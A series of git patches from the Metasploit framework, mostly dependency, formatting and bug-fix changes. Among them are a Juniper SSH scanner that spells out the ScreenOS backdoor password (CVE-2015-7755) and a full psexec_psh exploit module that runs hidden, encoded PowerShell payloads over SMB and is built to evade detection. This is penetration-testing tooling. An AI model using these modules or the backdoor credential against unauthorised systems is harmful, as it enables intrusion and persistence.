958ad21cfb..a0d0c38ced 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -3,9 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'net/ssh' + class MetasploitModule < Msf::Auxiliary - require 'net/ssh' include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -13,17 +14,17 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Juniper SSH Backdoor Scanner', 'Description' => %q{ - This module scans for the Juniper SSH backdoor. Also valid on telnet. - A username is required, and hte password is <<< %s(un='%s') = %u + This module scans for the Juniper SSH backdoor (also valid on Telnet). + Any username is required, and the password is <<< %s(un='%s') = %u. }, 'Author' => [ - 'hdm', # discovery - 'h00die ' # Module + 'hdm', # Discovery + 'h00die ' # Module ], 'References' => [ ['CVE', '2015-7755'], ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'], - ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713&cat=SIRT_1&actp=LIST'] + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'] ], 'DisclosureDate' => 'Dec 20 2015', 'License' => MSF_LICENSE @@ -43,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary ssh_opts = { port: rport, auth_methods: ['password', 'keyboard-interactive'], - password: '<<< %s(un=\'%s\') = %u' + password: %q{<<< %s(un='%s') = %u} } ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] @@ -62,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary end if ssh - print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un=\'%s\') = %u") + print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u") report_vuln( :host => ip, :name => self.name, From 60bee16e8ce3ba8c1de08f188ce58b5a8d28cc5a Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 1 Apr 2016 13:48:43 -0500 Subject: [PATCH 653/686] Restore psexec_psh See @jabra-'s comments on #6222. --- modules/exploits/windows/smb/psexec_psh.rb | 105 +++++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 modules/exploits/windows/smb/psexec_psh.rb diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb new file mode 100644 index 0000000000..8bb4b2e71c --- /dev/null +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -0,0 +1,105 @@ +# -*- coding: binary -*- + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + # Exploit mixins should be called first + include Msf::Exploit::Remote::SMB::Client::Psexec + include Msf::Exploit::Powershell + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 1, 1), 'exploit/windows/smb/psexec') + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', + 'Description' => %q{ + This module uses a valid administrator username and password to execute a powershell + payload using a similar technique to the "psexec" utility provided by SysInternals. The + payload is encoded in base64 and executed from the commandline using the -encodedcommand + flag. Using this method, the payload is never written to disk, and given that each payload + is unique, is less prone to signature based detection. A persist option is provided to + execute the payload in a while loop in order to maintain a form of persistence. In the + event of a sandbox observing PSH execution, a delay and other obfuscation may be added to + avoid detection. In order to avoid interactive process notifications for the current user, + the psh payload has been reduced in size and wrapped in a powershell invocation which hides + the window entirely. + }, + + 'Author' => [ + 'Royce @R3dy__ Davis ', # PSExec command module + 'RageLtMan ' # PSH exploit, libs, encoders + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'EXITFUNC' => 'thread' + }, + 'Payload' => + { + 'Space' => 3072, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 01 1999', + 'References' => [ + [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) + [ 'OSVDB', '3106'], + [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ], + [ 'URL', 'http://sourceforge.net/projects/smbexec/' ], + [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] + ] + )) + + register_options([ + OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]), + ], self.class) + end + + def exploit + command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) + if datastore['DryRun'] + print_good command.inspect + return + end + + if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] + print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") + end + + # Try and authenticate with given credentials + if connect + begin + smb_login + rescue StandardError => autherror + fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") + end + # Execute the powershell command + print_status("Executing the payload...") + begin + return psexec(command) + rescue StandardError => exec_command_error + fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") + ensure + disconnect + end + end + end + +end + From d23a1c4551120a14729918c57e8c3b0e9cf91512 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 1 Apr 2016 13:57:58 -0500 Subject: [PATCH 654/686] Bump deprecation date --- modules/exploits/windows/smb/psexec_psh.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 8bb4b2e71c..1c912acdfa 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Module::Deprecated - deprecated(Date.new(2016, 1, 1), 'exploit/windows/smb/psexec') + deprecated(Date.new(2016, 4, 30), 'exploit/windows/smb/psexec') def initialize(info = {}) super(update_info(info, From 64b94dfe3b3d5cdc58cd50e4e489d848f0bfe73a Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Apr 2016 14:43:16 -0500 Subject: [PATCH 655/686] reimplement HD's session interrupt handler reimplement HD's work on a session interrupt handler so that if an exploit fails the handler does not continue waiting for a session that will never come MS-385 --- lib/msf/core/exploit.rb | 15 ++++++++++++--- lib/msf/core/handler.rb | 8 ++++++++ 2 files changed, 20 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index f70884cdb3..b01729ed03 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1197,9 +1197,15 @@ class Exploit < Msf::Module # value can be one of the Handler::constants. # def handler(*args) - return if not payload_instance - return if not handler_enabled? - return payload_instance.handler(*args) + unless payload_instance && handler_enabled? + payload_instance.handler(*args) + end + end + + def interrupt_handler + if payload_instance && handler_enabled? && payload_instance.respond_to?(:interrupt_wait_for_session) + payload_instance.interrupt_wait_for_session() + end end ## @@ -1351,6 +1357,9 @@ class Exploit < Msf::Module # Report the failure (and attempt) in the database self.report_failure + + # Interrupt any session waiters in the handler + self.interrupt_handler end def report_failure diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index eafe12f97f..2ed2842ba8 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -163,6 +163,14 @@ module Handler return session end + # + # Interrupts a wait_for_session call by notifying with a nil event + # + def interrupt_wait_for_session + return unless session_waiter_event + session_waiter_event.notify(nil) + end + # # Set by the exploit module to configure handler # From 3d995546d9bb0621f532f2c072333eae5feac6e2 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 1 Apr 2016 21:30:11 -0500 Subject: [PATCH 656/686] check for true before empty string --- .../meterpreter/ui/console/command_dispatcher/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb index 6a9d62b56e..9634db26cc 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -107,7 +107,7 @@ class Console::CommandDispatcher::Powershell result = client.powershell.import_file(opts) if result.nil? || result == false print_error("File failed to load.") - elsif result.empty? + elsif result == true || result.empty? print_good("File successfully imported. No result was returned.") else print_good("File successfully imported. Result:\n#{result}") From 627615d47bfdf3412c32489df5c4341e2ac6ac78 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 1 Apr 2016 21:30:34 -0500 Subject: [PATCH 657/686] update to payloads 1.1.6 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 0bfef26ad5..b887521766 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) - metasploit-payloads (= 1.1.5) + metasploit-payloads (= 1.1.6) metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) @@ -130,7 +130,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.5) + metasploit-payloads (1.1.6) metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 752b93bfef..31874f7c22 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.5' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.6' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 992df12fa7ff2314961d2f37dafda602abc30174 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sat, 2 Apr 2016 00:22:26 -0400 Subject: [PATCH 658/686] Address ActiveRecord deprecation warning AR will start to complain about eager loading in command_dispatcher /db.rb:519 because it references hosts as string without explicitly stating that the table is being referenced. Add a call .references in the AR call chain after the where clause to silence this abysmal warning. --- lib/msf/ui/console/command_dispatcher/db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 8e674f0d4a..d2b59bdf5e 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -463,7 +463,7 @@ class Db if search_term next unless ( host.attribute_names.any? { |a| host[a.intern].to_s.match(search_term) } || - !Mdm::Tag.includes(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", framework.db.workspace.id, host.address, search_term.source).order("tags.id DESC").empty? + !Mdm::Tag.includes(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", framework.db.workspace.id, host.address, search_term.source).references(:hosts).order("tags.id DESC").empty? ) end From c6bdc3fa148e53aea65e7b8576fde981f3c2b03e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sat, 2 Apr 2016 13:18:23 -0500 Subject: [PATCH 659/686] fix the path quoting in open_webrtc_browser --- lib/rex/compat.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb index 24b94fb1d0..4a4564a7a5 100644 --- a/lib/rex/compat.rb +++ b/lib/rex/compat.rb @@ -167,7 +167,7 @@ def self.open_webrtc_browser(url='http://google.com/') paths.each do |path| if File.exists?(path) args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : "" - system("#{path} #{args} #{url}") + system("\"#{path}\" #{args} \"#{url}\"") return true end end From fea142dc6ea6de4416171966ace58dfefb969a29 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Apr 2016 13:55:53 -0500 Subject: [PATCH 660/686] unlock gemfile deps first unlock the gemfile deps MS-1330 --- Gemfile | 8 ++++---- Gemfile.lock | 8 ++++---- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile b/Gemfile index 059418ff05..ca9c6151ea 100755 --- a/Gemfile +++ b/Gemfile @@ -34,14 +34,14 @@ end group :development, :test do # automatically include factories from spec/factories - gem 'factory_girl_rails', '~> 4.5.0' + gem 'factory_girl_rails' # Make rspec output shorter and more useful - gem 'fivemat', '~> 1.3.1' + gem 'fivemat' # running documentation generation tasks and rspec tasks - gem 'rake', '~> 10.5' + gem 'rake' # Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the # environment is development - gem 'rspec-rails' , '~> 3.3' + gem 'rspec-rails' end group :test do diff --git a/Gemfile.lock b/Gemfile.lock index 5e2069d2fe..694ebadaaf 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -295,8 +295,8 @@ PLATFORMS DEPENDENCIES aruba cucumber-rails - factory_girl_rails (~> 4.5.0) - fivemat (~> 1.3.1) + factory_girl_rails + fivemat metasploit-concern! metasploit-credential! metasploit-erd! @@ -306,9 +306,9 @@ DEPENDENCIES metasploit_data_models! octokit (~> 4.0) pry - rake (~> 10.5) + rake redcarpet - rspec-rails (~> 3.3) + rspec-rails shoulda-matchers simplecov timecop From c3452ab982bb7d5b8c9c9ae77ff974ae54696216 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Apr 2016 15:31:09 -0500 Subject: [PATCH 661/686] unlock gemspec deps unlock version constraints on deps defined inside the gemspec MS-1330 --- Gemfile.lock | 26 +++++++++++++------------- metasploit-framework.gemspec | 20 ++++++++++---------- 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 694ebadaaf..7c1d1ad172 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -87,26 +87,26 @@ PATH activesupport (>= 4.1.0, < 4.2.0) bcrypt filesize - jsobfu (~> 0.4.1) + jsobfu json - metasm (~> 1.0.2) - metasploit-model (= 1.1.0) + metasm + metasploit-model metasploit-payloads (= 1.1.6) msgpack - network_interface (~> 0.0.1) + network_interface nokogiri octokit - openssl-ccm (= 1.2.1) - packetfu (= 1.1.11) - patch_finder (>= 1.0.2) + openssl-ccm + packetfu + patch_finder pcaprub - pg (>= 0.11) + pg railties rb-readline-r7 - recog (= 2.0.14) + recog redcarpet robots - rubyzip (~> 1.1) + rubyzip sqlite3 tzinfo @@ -182,7 +182,7 @@ GEM erubis (2.7.0) factory_girl (4.5.0) activesupport (>= 3.0.0) - factory_girl_rails (4.5.0) + factory_girl_rails (4.6.0) factory_girl (~> 4.5.0) railties (>= 3.0.0) faraday (0.9.2) @@ -241,9 +241,9 @@ GEM activesupport (= 4.1.15) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (10.5.0) + rake (11.1.2) rb-readline-r7 (0.5.2.0) - recog (2.0.14) + recog (2.0.19) nokogiri redcarpet (3.3.4) rkelly-remix (0.0.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index bb54b7069e..3d1b102eb2 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -55,11 +55,11 @@ Gem::Specification.new do |spec| # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) spec.add_runtime_dependency 'bcrypt' # Needed for Javascript obfuscation - spec.add_runtime_dependency 'jsobfu', '~> 0.4.1' + spec.add_runtime_dependency 'jsobfu' # Needed for some admin modules (scrutinizer_add_user.rb) spec.add_runtime_dependency 'json' # Metasm compiler/decompiler/assembler - spec.add_runtime_dependency 'metasm', '~> 1.0.2' + spec.add_runtime_dependency 'metasm' # Metasploit::Concern hooks #spec.add_runtime_dependency 'metasploit-concern' # Metasploit::Credential database models @@ -68,32 +68,32 @@ Gem::Specification.new do |spec| #spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' # Things that would normally be part of the database model, but which # are needed when there's no database - spec.add_runtime_dependency 'metasploit-model', '1.1.0' + spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.1.6' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. - spec.add_runtime_dependency 'network_interface', '~> 0.0.1' + spec.add_runtime_dependency 'network_interface' # Needed by anemone crawler spec.add_runtime_dependency 'nokogiri' # Needed by db.rb and Msf::Exploit::Capture - spec.add_runtime_dependency 'packetfu', '1.1.11' + spec.add_runtime_dependency 'packetfu' # For sniffer and raw socket modules spec.add_runtime_dependency 'pcaprub' # Needed for module caching in Mdm::ModuleDetails - spec.add_runtime_dependency 'pg', '>= 0.11' + spec.add_runtime_dependency 'pg' # Run initializers for metasploit-concern, metasploit-credential, metasploit_data_models Rails::Engines spec.add_runtime_dependency 'railties' # required for OS fingerprinting - spec.add_runtime_dependency 'recog', '2.0.14' + spec.add_runtime_dependency 'recog' # required for bitlocker fvek extraction - spec.add_runtime_dependency 'openssl-ccm', '1.2.1' + spec.add_runtime_dependency 'openssl-ccm' # Needed for documentation generation spec.add_runtime_dependency 'octokit' spec.add_runtime_dependency 'redcarpet' # Needed for Microsoft patch finding tool (msu_finder) - spec.add_runtime_dependency 'patch_finder', '>= 1.0.2' + spec.add_runtime_dependency 'patch_finder' # rb-readline doesn't work with Ruby Installer due to error with Fiddle: # NoMethodError undefined method `dlopen' for Fiddle:Module @@ -106,7 +106,7 @@ Gem::Specification.new do |spec| # Needed by anemone crawler spec.add_runtime_dependency 'robots' # Needed by some modules - spec.add_runtime_dependency 'rubyzip', '~> 1.1' + spec.add_runtime_dependency 'rubyzip' # Needed for some post modules spec.add_runtime_dependency 'sqlite3' # required for Time::TZInfo in ActiveSupport From 5a6d1ee0a9b069e7993dbab7293e1be90821bb9b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 4 Apr 2016 16:30:55 -0500 Subject: [PATCH 662/686] Uses MetasploitModule class name --- modules/auxiliary/gather/snare_registry.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/snare_registry.rb b/modules/auxiliary/gather/snare_registry.rb index 5babbb9f56..a8a3b3868c 100644 --- a/modules/auxiliary/gather/snare_registry.rb +++ b/modules/auxiliary/gather/snare_registry.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report From da3388248a6a55d9277c12ddfa91f6441409266e Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 4 Apr 2016 16:34:49 -0500 Subject: [PATCH 663/686] Uses #blank? --- modules/auxiliary/gather/snare_registry.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/snare_registry.rb b/modules/auxiliary/gather/snare_registry.rb index a8a3b3868c..c2f8c765ae 100644 --- a/modules/auxiliary/gather/snare_registry.rb +++ b/modules/auxiliary/gather/snare_registry.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary # Retrieve the supplied registry key # def dump_key(reg_key) - if reg_key.nil? || reg_key.empty? + if reg_key.blank? fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name") end hive = reg_key.split('\\').first @@ -124,7 +124,7 @@ class MetasploitModule < Msf::Auxiliary # def dump_all hives = retrieve_hive_list - if hives.nil? || hives.empty? + if hives.blank? print_error("#{peer} - Found no registry hives") return end From 3bcac49c212e826f90eb1fa591ed147ecab67a7d Mon Sep 17 00:00:00 2001 From: Justin Steven Date: Tue, 5 Apr 2016 09:59:52 +1000 Subject: [PATCH 664/686] Fix: badchars.present? is false for whitespace badchars.present? is false in the case of badchars containing only whitespace. Instead check for is not empty and is not nil. --- lib/msf/core/payload_generator.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 74ee6b6c4e..2879093ba7 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -376,7 +376,7 @@ module Msf encoders << e if e end encoders.sort_by { |my_encoder| my_encoder.rank }.reverse - elsif badchars.present? + elsif !badchars.empty? && !badchars.nil? framework.encoders.each_module_ranked('Arch' => [arch], 'Platform' => platform_list) do |name, mod| e = framework.encoders.create(name) e.datastore.import_options_from_hash(datastore) From af7eef231c886591a99ff264be1a1d6f5028d2d6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 29 Mar 2016 00:21:24 -0500 Subject: [PATCH 665/686] Fix a few issues with the SSL scanner First, we need to handle public keys with strength not measured on the same bit scale as RSA keys. This fixes handshakes for ECDSA and others. Second, depending on the host we are talking to, we may not have a peer cert. Handle this properly by checking first on the socket before using it. --- modules/auxiliary/scanner/http/ssl.rb | 49 ++++++++++++++++----------- 1 file changed, 29 insertions(+), 20 deletions(-) diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index a9d83972b3..2ac6033fb3 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -38,56 +38,65 @@ class MetasploitModule < Msf::Auxiliary connect(true, {"SSL" => true}) #Force SSL - cert = OpenSSL::X509::Certificate.new(sock.peer_cert) + if sock.respond_to? :peer_cert + cert = OpenSSL::X509::Certificate.new(sock.peer_cert) + end disconnect if cert - print_status("#{ip}:#{rport} Subject: #{cert.subject}") - print_status("#{ip}:#{rport} Issuer: #{cert.issuer}") - print_status("#{ip}:#{rport} Signature Alg: #{cert.signature_algorithm}") - public_key_size = cert.public_key.n.num_bytes * 8 - print_status("#{ip}:#{rport} Public Key Size: #{public_key_size} bits") - print_status("#{ip}:#{rport} Not Valid Before: #{cert.not_before}") - print_status("#{ip}:#{rport} Not Valid After: #{cert.not_after}") + print_status("Subject: #{cert.subject}") + print_status("Issuer: #{cert.issuer}") + print_status("Signature Alg: #{cert.signature_algorithm}") + + # If we use ECDSA rather than RSA, our metrics for key size are different + public_key_size = 0 + if cert.public_key.respond_to? :n + public_key_size = cert.public_key.n.num_bytes * 8 + print_status("Public Key Size: #{public_key_size} bits") + end + print_status("Not Valid Before: #{cert.not_before}") + print_status("Not Valid After: #{cert.not_after}") # Checks for common properties of self signed certificates caissuer = (/CA Issuers - URI:(.*?),/i).match(cert.extensions.to_s) if caissuer.to_s.empty? - print_good("#{ip}:#{rport} Certificate contains no CA Issuers extension... possible self signed certificate") + print_good("Certificate contains no CA Issuers extension... possible self signed certificate") else - print_status("#{ip}:#{rport} " +caissuer.to_s[0..-2]) + print_status(caissuer.to_s[0..-2]) end if cert.issuer.to_s == cert.subject.to_s - print_good("#{ip}:#{rport} Certificate Subject and Issuer match... possible self signed certificate") + print_good("Certificate Subject and Issuer match... possible self signed certificate") end alg = cert.signature_algorithm if alg.downcase.include? "md5" - print_status("#{ip}:#{rport} WARNING: Signature algorithm using MD5 (#{alg})") + print_status("WARNING: Signature algorithm using MD5 (#{alg})") end vhostn = nil cert.subject.to_a.each do |n| vhostn = n[1] if n[0] == 'CN' end - if public_key_size == 1024 - print_status("#{ip}:#{rport} WARNING: Public Key only 1024 bits") - elsif public_key_size < 1024 - print_status("#{ip}:#{rport} WARNING: Weak Public Key: #{public_key_size} bits") + if public_key_size > 0 + if public_key_size == 1024 + print_status("WARNING: Public Key only 1024 bits") + elsif public_key_size < 1024 + print_status("WARNING: Weak Public Key: #{public_key_size} bits") + end end if cert.not_after < Time.now - print_status("#{ip}:#{rport} WARNING: Certificate not valid anymore") + print_status("WARNING: Certificate not valid anymore") end if cert.not_before > Time.now - print_status("#{ip}:#{rport} WARNING: Certificate not valid yet") + print_status("WARNING: Certificate not valid yet") end if vhostn - print_status("#{ip}:#{rport} has common name #{vhostn}") + print_status("Has common name #{vhostn}") # Store the virtual hostname for HTTP report_note( @@ -125,7 +134,7 @@ class MetasploitModule < Msf::Auxiliary end else - print_status("#{ip}:#{rport}] No certificate subject or common name found") + print_status("No certificate subject or common name found") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE From 8cc1d2ec8973936f4c74d68d2262eaad062a32ef Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Apr 2016 15:05:58 -0500 Subject: [PATCH 666/686] Make advanced and evasion options readable --- lib/msf/base/serializer/readable_text.rb | 68 +++++++++---------- lib/msf/ui/console/command_dispatcher/core.rb | 10 +-- 2 files changed, 37 insertions(+), 41 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index ae2cca777a..c4c2838cd1 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -400,8 +400,7 @@ class ReadableText 'Description' ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| val = mod.datastore[name] || opt.default next if (opt.advanced?) @@ -409,7 +408,7 @@ class ReadableText next if (missing && opt.valid?(val)) tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] - } + end return tbl.to_s end @@ -420,24 +419,23 @@ class ReadableText # @param indent [String] the indentation to use. # @return [String] the string form of the information. def self.dump_advanced_options(mod, indent = '') - output = '' - pad = indent + tbl = Rex::Ui::Text::Table.new( + 'Indent' => indent.length, + 'Columns' => + [ + 'Name', + 'Current Setting', + 'Required', + 'Description' + ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| + next unless opt.advanced? + val = mod.datastore[name] || opt.default + tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] + end - next if (!opt.advanced?) - - val = mod.datastore[name] || opt.default.to_s - desc = word_wrap(opt.desc, indent.length + 3) - desc = desc.slice(indent.length + 3, desc.length) - - output << pad + "Name : #{name}\n" - output << pad + "Current Setting: #{val}\n" - output << pad + "Description : #{desc}\n" - } - - return output + return tbl.to_s end # Dumps the evasion options associated with the supplied module. @@ -446,25 +444,23 @@ class ReadableText # @param indent [String] the indentation to use. # @return [String] the string form of the information. def self.dump_evasion_options(mod, indent = '') - output = '' - pad = indent + tbl = Rex::Ui::Text::Table.new( + 'Indent' => indent.length, + 'Columns' => + [ + 'Name', + 'Current Setting', + 'Required', + 'Description' + ]) - mod.options.sorted.each { |entry| - name, opt = entry + mod.options.sorted.each do |name, opt| + next unless opt.evasion? + val = mod.datastore[name] || opt.default + tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ] + end - next if (!opt.evasion?) - - val = mod.datastore[name] || opt.default || '' - - desc = word_wrap(opt.desc, indent.length + 3) - desc = desc.slice(indent.length + 3, desc.length) - - output << pad + "Name : #{name}\n" - output << pad + "Current Setting: #{val}\n" - output << pad + "Description : #{desc}\n" - } - - return output + return tbl.to_s end # Dumps the references associated with the supplied module. diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 5138b742cb..bfcef247c1 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -828,7 +828,7 @@ class Core end end - args.each { |name| + args.each do |name| mod = framework.modules.create(name) if (mod == nil) @@ -836,7 +836,7 @@ class Core else show_options(mod) end - } + end end # @@ -2600,9 +2600,9 @@ class Core # Tab completion for the unset command # # @param str [String] the string currently being typed before tab was hit - # @param words [Array] the previously completed words on the command line. words is always - # at least 1 when tab completion has reached this stage since the command itself has been completed - + # @param words [Array] the previously completed words on the command + # line. `words` is always at least 1 when tab completion has reached this + # stage since the command itself has been completed. def cmd_unset_tabs(str, words) datastore = active_module ? active_module.datastore : self.framework.datastore datastore.keys From fa959225471e5d724722652606ad611c726bd47e Mon Sep 17 00:00:00 2001 From: Brendan Watters Date: Tue, 5 Apr 2016 16:06:51 -0500 Subject: [PATCH 667/686] Add unicode test examples --- test/modules/post/test/registry.rb | 36 +++++++++++++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb index a5b4f35985..cd1e9c4fce 100644 --- a/test/modules/post/test/registry.rb +++ b/test/modules/post/test/registry.rb @@ -126,7 +126,6 @@ class MetasploitModule < Msf::Post ret end - it "should write REG_DWORD values" do ret = true registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD") @@ -154,6 +153,41 @@ class MetasploitModule < Msf::Post ret end + it "should create unicode keys" do + ret = registry_createkey(%q#HKCU\σονσλυσιονεμκυε#) + end + + it "should write REG_SZ unicode values" do + ret = true + registry_setvaldata(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str", "дэлььякатезшимя", "REG_SZ") + registry_setvaldata(%q#HKCU\σονσλυσιονεμκυε#, "test_val_dword", 1234, "REG_DWORD") + valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str") + if (valinfo.nil?) + ret = false + else + # type == REG_SZ means string + ret &&= !!(valinfo["Type"] == 1) + ret &&= !!(valinfo["Data"].kind_of? String) + ret &&= !!(valinfo["Data"] == 